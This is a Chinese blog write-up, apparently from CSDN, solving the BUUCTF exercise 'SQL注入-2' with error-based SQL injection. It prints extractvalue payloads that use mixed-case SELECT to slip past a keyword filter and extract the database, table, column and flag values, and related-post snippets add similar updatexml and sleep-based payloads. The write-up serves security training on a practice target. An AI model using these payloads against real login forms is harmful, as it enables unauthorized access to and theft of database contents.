[第一章 web入门]SQL注入-2

最新推荐文章于 2024-02-26 21:00:10 发布
最新推荐文章于 2024-02-26 21:00:10 发布
阅读量935 收藏 2
点赞数
文章标签: sql php 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43618536/article/details/125963045
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

[第一章 web入门]SQL注入-2

题目

BUUCTF的[第一章 web入门]SQL注入-2
在这里插入图片描述

一、收集信息

提示:
请访问 /login.php和 /user.php

1.访问/login.php
源代码中提示:

<!-- 如果觉得太难了,可以在url后加入?tips=1 开启mysql错误提示,使用burp发包就可以看到啦-->

2.访问/user.php
无信息

二、进行注入

在/login.php后面添加?tips=1
提交用户名、密码(随便输入),进行抓包

使用报错注入、select被过滤

1)报错注入
extractvalue
updatexml

2)爆数据库名

name=1'and extractvalue(1,concat(0x7e,(SeLeCt(database()))))%23&pass=1

3)爆表名

name=1'and extractvalue(1,concat(0x7e,(SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema)like('note'))))%23&pass=1

4)爆字段

name=1'and extractvalue(1,concat(0x7e,(SelEct(group_concat(column_name))from(information_schema.columns)where(table_name)like('fl4g'))))%23&pass=1

5)爆数据

name=1'and extractvalue(1,concat(0x7e,(SeLect(flag)from(note.fl4g))))%23&pass=1

在这里插入图片描述

林本
关注
Web入门Sql注入(二)
qq_51459823的博客
11-16 1119
通过触发 SQL 错误来诱导条件响应 在前面的示例中,假设应用程序执行相同的 SQL 查询,但根据查询是否返回任何数据,行为没有任何不同。前面的技术将不起作用,因为注入不同的布尔条件对应用程序的响应没有影响。 在这种情况下,根据注入的条件,通常可以通过有条件地触发 SQL 错误来诱导应用程序返回条件响应。这涉及修改查询,以便在条件为真时会导致数据库错误,但如果条件为假则不会。很多时候,数据库抛出的未处理的错误会导致应用程序的响应(例如错误消息)出现一些差异,从而使我们能够推断注入条件的真实性。 要查看
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1315
简单的SQL注入
[第一章 web入门]SQL注入-2 题目分析与详解
最新发布
2302_79800344的博客
02-26 1082
一、题目简介。
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析)
weixin_66146598的博客
06-09 5650
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析),《从0到1:CTFer成长之路》书籍配套题目之sql注入。1、有的网站会开启错误调试信息方便开发者调试,可以利用报错信息进行报错注入2、updatexml第二个参数应为合法XPATH路径,否则会在引发报错的同时输出传入的参数3、dual用于测试数据库是否可以正常使用4、如果没有报错提示,可以bool注入...
BUUCTF [第一章 web入门]SQL注入-2
qq_45707441的博客
12-22 2702
经分析后可知:当输入admin’ and 1=3# 时返回为假 {“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"} 当输入admin’ and 1=1# 时返回为真{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"} 根据返回的字符串,我们可以写出解决的python脚本 #数据库名字长度 import string import requests url="http://e2cc3e..
BUUCTF[第一章 web入门]SQL注入-2
hivjianxian的博客
11-22 669
ctf题解
WEB入门——SQL注入(二)
HasntStartIsOver的博客
06-03 367
二次注入和绕过
Web入门SQL注入(一)
qq_51459823的博客
11-12 643
昨天装好了工具,今天开始入门Web吧!就以Burpsuite官方靶场作为学习Web的起点 如下知识为刷Burpsite官方靶场所得,部分为自我思考,如有错误,希望各位提出: 首先我们先了解一下: 什么是 SQL 注入 (SQLi)? SQL 注入是一种 Web 安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的内容或行为发生
《从0到1:CTFer成长之路》书籍配套题目-[第一章 web入门]SQL注入-1
weixin_46703850的博客
02-09 1033
《从0到1:CTFer成长之路》书籍配套题目,来源网站:[《从0到1:CTFer成长之路》](https://book.nu1l.com/)
[web入门]SQL注入-2
1tachi的博客
12-02 686
请原谅我发出一点不友好的声音: 每个人无论是做完题了,还是没做完题,他只要是想进步,都会搜一下WP,尤其是BUUCTF的WP更有必要搜一下,为的是更标准、更多的思路,不成想我搜索发现,清一色! 思路一摸一样,用的函数一模一样,更甚之有的连思路都没有,上来就报错注入,生怕别人不知道他是抄的wp。。。令人无语! 我写的这个是我自己的思路,权当是留作笔记吧,或者是一点不健康的牢骚。。。 ...
CTHUB-N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-2
weixin_40872714的博客
03-28 966
CTHUB-N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-2 查看html代码,看到有一个提示,说明是要我们报错注入 先抓包,加了tips=1后就会有报错的信息 首先报数据库 note 尝试报表名,出错了,根据错误信息,可能是前面的select被过滤了,这里就是不断尝试,没有什么好的方法 使用双写绕过 获得了关键的fl4g表,flag应该就在这里面 尝试报字段名得到flag字段 直接得到flag ...
SQL注入buuctf web入门sql注入2)
weixin_44214568的博客
07-13 2086
1.启动靶机: 2.进入login.php界面 ps:界面没有注入口,因为这个题目是sql注入,尝试输入常规的login界面,进入了login界面 我们学习ctf,在基础阶段还是要抛开脑洞,掌握并且形成一套破解模式 3.查看源代码 这个源代码里面有用的信息就是?tips=1,但是加到url后面也没什么效果 4.抓包吧 尝试了一下普通的注入没有啥用 5.先用burpsuit查看数据库 注入语句 1' and updatexml(1,concat(0x7e,(select data
一道题讲懂SQL盲注 / [第一章 web入门]SQL注入-2
satasun的博客
12-13 2241
概述 本题是一个盲注题,可以基于布尔也可以基于时间,如果不会的话可以根据提示在网址后面加一个?tips=1降低难度成为一个基于报错的盲注。 解法一:基于时间 直接在前端进行注入的话没有报错回显,所以需要抓个包然后开始测试。 测库名 首先测试库名长度 name=1'+or+if(length(database())=4,sleep(1),1)#&pass=asdasd 等了3秒,我们默认是sleep1秒,但是不知道为什么睡的时间是输入的3-4倍左右,不管了,反正长度是4(1-4慢慢试) 然后测试
N1BOOK第六关摸鱼:[第一章 web入门]SQL注入-2
weixin_45571987的博客
12-04 4108
BUUCTF:[第一章 web入门]SQL注入-2打开题目,寻找解题线索开始解题得到回显开始注入题目原理 打开题目,寻找解题线索   直接打开链接页面如下,我们按提示分别访问/login.php 和 /user.php 去看看   进入页面后习惯性地查看源代码发现有一行注释提示,告诉我们:可以在url后加入?tips=1 开启mysql错误提示,使用burp发包就可以看到啦   另一个页面则就只有一行 login first 开始解题 得到回显   此时我们打开burp进行抓包(没有安装burp的兄
[第一章 web入门]SQL注入-1,[第一章 web入门]SQL注入-2
m0_73721944的博客
11-14 103
得到payload:name=1'and updatexml(1,concat(0x7e,(sELECT group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+&pass=1' and 1=2 --+-- 如果觉得太难了,可以在url后加入?id=1 and 1=1--+ 正常。id=1' and 1=1--+ 正常。打开是这样的,很明显在url中存在注入点。
web安全之SQL注入---第二章 什么是sql注入
weixin_33863087的博客
08-21 101
如何理解SQL注入SQL注入是一种将SQL代码添加到输入参数中传递到SQL服务器解析并执行的一种攻击方法总结:其实就是输入的参数没有进行过滤,直接参加sql语句的运算,达到不可预想的结果。SQL注入是怎么产生的?1.web开发人员无法保证所有的输入都已经过滤2.攻击者利用发送给SQL服务器的输入数据构造可执行的代码3.数据库未做相应的安全配置 转载于:https://www.cnblogs.co...
[第一章 web入门]sql注入-2
03-16
SQL注入是一种常见的网络攻击方式,攻击者通过在输入框中输入恶意代码,从而获取数据库中的敏感信息或者对数据库进行恶意操作。为了防止SQL注入攻击,我们需要对输入进行过滤和验证,同时使用参数化查询等安全措施来保护数据库的安全。在开发过程中,我们也需要注意代码的安全性,避免出现SQL注入漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值